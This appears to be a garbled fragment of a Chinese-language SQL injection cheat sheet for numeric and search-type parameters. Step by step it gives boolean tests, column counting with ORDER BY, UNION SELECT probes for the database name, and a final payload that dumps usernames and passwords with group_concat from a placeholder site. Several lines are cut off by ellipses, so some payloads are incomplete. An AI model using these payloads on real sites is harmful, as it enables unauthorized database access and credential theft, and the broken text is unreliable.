page=4&cid=x' and 1=2 and '1'='1 返回错误
搜索型
输入框中输入
' 返回错误
x%' and 1=1 and...搜索型
x%' order by 17 # 返回正确
x%' order by 18 # 返回错误
得出结论:字段数17。.... #
搜索型
x%' and 1=2 union select 1,2,3,4,5,6,7,8,9,.... #
查数据库名
数字型
http://www.xxx.cn/list.php?.... #
搜索型
x%' and 1=2 union select 1,2,database(),4,5,6,7,8,9,.... #
查数据库中表名
数字型
http://www.xxx.cn/list.php...1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from 表名 #
搜索型